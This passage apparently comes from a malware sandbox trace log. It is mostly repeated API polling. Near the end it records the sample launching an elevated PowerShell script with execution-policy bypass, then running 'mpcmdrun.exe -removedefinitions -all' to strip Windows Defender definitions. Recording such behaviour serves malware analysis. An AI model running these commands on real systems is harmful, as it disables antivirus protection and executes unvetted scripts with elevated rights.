(hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.432] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.452] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.455] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.497] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.508] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.540] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.553] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.565] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.589] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.596] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.626] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.673] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.715] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.721] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.766] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.804] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.818] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.843] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.847] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.895] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.920] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.923] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.943] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.969] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0052.012] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0052.023] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0052.041] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0052.059] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0052.075] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0053.363] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0053.375] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0053.394] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0053.412] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0053.436] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0053.464] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0053.468] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0053.483] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0053.499] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0053.519] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0053.530] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0053.558] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0053.563] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0053.581] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0053.599] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0053.628] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0053.640] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0053.656] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0053.673] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0053.686] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0053.717] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0053.743] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0053.764] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0053.789] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0053.796] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0053.817] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0053.830] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0053.843] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0053.860] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0053.873] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0053.893] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0053.913] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0053.920] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0053.955] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0053.968] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0053.983] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0053.997] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.014] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.029] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.044] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.091] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.107] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.123] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.138] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.156] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.172] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.187] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.201] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.219] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.232] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.275] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.279] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.294] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.309] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.349] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.365] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.403] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.427] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.450] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.491] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.524] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.531] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.559] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.585] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.591] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.637] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.655] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.673] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.698] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.700] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.715] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.734] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.809] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.824] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.846] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.912] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.945] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.978] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0054.981] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.027] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.057] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.063] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.078] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.105] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.143] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.153] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.171] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.186] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.200] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.221] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.246] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.270] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.278] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.292] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.308] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.325] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.339] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.355] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.372] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.393] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.402] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.419] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.433] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.448] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.465] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.480] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.495] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.511] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.531] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.542] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.558] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.573] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.589] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.604] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.620] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.635] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.651] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.667] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.682] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.700] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.713] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.733] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.745] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.772] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.792] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.807] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.823] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.838] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.854] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0055.872] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0056.202] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0056.800] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0059.459] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0061.154] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0061.160] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0061.196] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0061.515] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0061.652] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0061.689] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0061.727] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0061.741] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0061.765] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0061.767] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0061.783] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0061.798] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0061.814] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0061.860] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0061.876] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0061.896] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0061.914] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0061.954] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0061.984] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0061.986] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0062.000] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0062.019] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0062.039] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0062.068] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0062.093] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0062.101] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0062.110] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0062.153] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0062.204] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0062.250] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0062.271] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0062.283] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0062.297] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0062.318] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0062.338] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0062.348] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0062.360] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0062.375] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0062.421] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0062.437] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0062.461] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0062.515] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0062.580] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0062.647] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0062.665] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0062.767] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0062.796] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x0 [0062.796] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x32ed50 | out: hHeap=0x300000) returned 1 [0062.796] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0xa0) returned 0x32ed50 [0062.796] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x120) returned 0x32edf8 [0062.796] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x32ed50 | out: hHeap=0x300000) returned 1 [0062.796] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x1ae) returned 0x32f2b0 [0062.796] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x32edf8 | out: hHeap=0x300000) returned 1 [0062.796] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x1b0) returned 0x32ed50 [0062.796] SetLastError (dwErrCode=0x0) [0062.797] lstrcpyW (in: lpString1=0x18d4e0, lpString2="powershell -NoProfile -ExecutionPolicy Bypass -Command \"& {Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -File \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\script.ps1\"\"' -Verb RunAs}\"" | out: lpString1="powershell -NoProfile -ExecutionPolicy Bypass -Command \"& {Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -File \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\script.ps1\"\"' -Verb RunAs}\"") returned="powershell -NoProfile -ExecutionPolicy Bypass -Command \"& {Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -File \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\script.ps1\"\"' -Verb RunAs}\"" [0062.797] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="powershell -NoProfile -ExecutionPolicy Bypass -Command \"& {Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -File \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\script.ps1\"\"' -Verb RunAs}\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18d498*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18d488 | out: lpCommandLine="powershell -NoProfile -ExecutionPolicy Bypass -Command \"& {Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -File \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\script.ps1\"\"' -Verb RunAs}\"", lpProcessInformation=0x18d488*(hProcess=0xac, hThread=0xb0, dwProcessId=0xae8, dwThreadId=0xaec)) returned 1 [0062.802] WaitForSingleObject (hHandle=0xac, dwMilliseconds=0x1) returned 0x102 [0062.812] WaitForSingleObject (hHandle=0xac, dwMilliseconds=0x1) returned 0x102 [0062.833] WaitForSingleObject (hHandle=0xac, dwMilliseconds=0x1) returned 0x102 [0062.872] WaitForSingleObject (hHandle=0xac, dwMilliseconds=0x1) returned 0x102 [0062.879] WaitForSingleObject (hHandle=0xac, dwMilliseconds=0x1) returned 0x102 [0062.890] WaitForSingleObject (hHandle=0xac, dwMilliseconds=0x1) returned 0x102 [0063.087] WaitForSingleObject (hHandle=0xac, dwMilliseconds=0x1) returned 0x102 [0063.094] WaitForSingleObject (hHandle=0xac, dwMilliseconds=0x1) returned 0x102 [0063.109] WaitForSingleObject (hHandle=0xac, dwMilliseconds=0x1) returned 0x102 [0063.139] WaitForSingleObject (hHandle=0xac, dwMilliseconds=0x1) returned 0x102 [0063.351] WaitForSingleObject (hHandle=0xac, dwMilliseconds=0x1) returned 0x102 [0063.364] WaitForSingleObject (hHandle=0xac, dwMilliseconds=0x1) returned 0x102 [0063.374] WaitForSingleObject (hHandle=0xac, dwMilliseconds=0x1) returned 0x102 [0063.396] WaitForSingleObject (hHandle=0xac, dwMilliseconds=0x1) returned 0x102 [0063.413] WaitForSingleObject (hHandle=0xac, dwMilliseconds=0x1) returned 0x102 [0063.458] WaitForSingleObject (hHandle=0xac, dwMilliseconds=0x1) returned 0x102 [0063.482] WaitForSingleObject (hHandle=0xac, dwMilliseconds=0x1) returned 0x102 [0063.482] WaitForSingleObject (hHandle=0xac, dwMilliseconds=0x1) returned 0x102 [0063.501] WaitForSingleObject (hHandle=0xac, dwMilliseconds=0x1) returned 0x102 [0063.514] WaitForSingleObject (hHandle=0xac, dwMilliseconds=0x1) returned 0x0 [0063.528] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x32ed50 | out: hHeap=0x300000) returned 1 [0063.528] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x32f2b0 | out: hHeap=0x300000) returned 1 [0063.528] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows Defender", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18e514 | out: phkResult=0x18e514*=0x0) returned 0x2 [0063.528] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x90) returned 0x32ed50 [0063.528] SetLastError (dwErrCode=0x0) [0063.528] lstrcpyW (in: lpString1=0x18d4e0, lpString2="C:\\Program Files\\Windows Defender\\mpcmdrun.exe -removedefinitions -all" | out: lpString1="C:\\Program Files\\Windows Defender\\mpcmdrun.exe -removedefinitions -all") returned="C:\\Program Files\\Windows Defender\\mpcmdrun.exe -removedefinitions -all" [0063.528] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Program Files\\Windows Defender\\mpcmdrun.exe -removedefinitions -all", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18d498*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18d488 | out: lpCommandLine="C:\\Program Files\\Windows Defender\\mpcmdrun.exe -removedefinitions -all", lpProcessInformation=0x18d488*(hProcess=0xb4, hThread=0xb8, dwProcessId=0xb40, dwThreadId=0xb44)) returned 1 [0063.537] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x1) returned 0x102 [0063.671] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x1) returned 0x102 [0063.695] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x1) returned 0x102 [0063.701] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x1) returned 0x102 [0063.723] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x1) returned 0x102 [0063.734] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x1) returned 0x102 [0063.748] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x1) returned 0x102 [0063.766] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x1) returned 0x102 [0063.779] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x1) returned 0x102 [0063.795] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x1) returned 0x102 [0063.811] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x1) returned 0x102 [0063.826] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x1) returned 0x102 [0063.827] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x1) returned 0x102 [0063.828] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x1) returned 0x102 [0063.828] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x1) returned 0x102 [0063.829] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x1) returned 0x102 [0063.830] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x1) returned 0x102 [0063.831] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x1) returned 0x102 [0063.832] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x1) returned 0x102 [0063.833] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x1) returned 0x102 [0063.834] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x1) returned 0x102 [0063.836] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x1) returned 0x102 [0063.837] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x1) returned 0x102 [0063.837] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x1) returned 0x102 [0063.838] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x1) returned 0x102 [0063.839] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x1) returned 0x102 [0063.840] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x1) returned 0x102 [0063.841] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x1) returned 0x102 [0063.842] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x1) returned 0x102 [0063.844] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x1) returned 0x102 [0063.844] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x1) returned 0x102 [0063.846] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x1) returned 0x102 [0063.846] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x1) returned 0x102 [0063.848] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x1) returned 0x102 [0063.848] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x1) returned 0x102 [0063.849] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x1) returned 0x102 [0063.850] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x1) returned 0x102 [0063.855] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x1) Process: id = "10" image_name = "5.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\5.exe" page_root = "0x4de8f000" os_pid = "0xa20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x938" cmd_line = 